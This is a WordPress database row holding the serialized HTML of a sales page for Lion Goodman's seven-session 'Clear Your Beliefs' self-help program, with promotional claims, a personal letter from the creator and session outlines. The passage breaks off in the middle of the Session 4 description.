(1840, 2149, 'panels_data', 'a:3:{s:7:"widgets";a:2:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:71186:"<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div 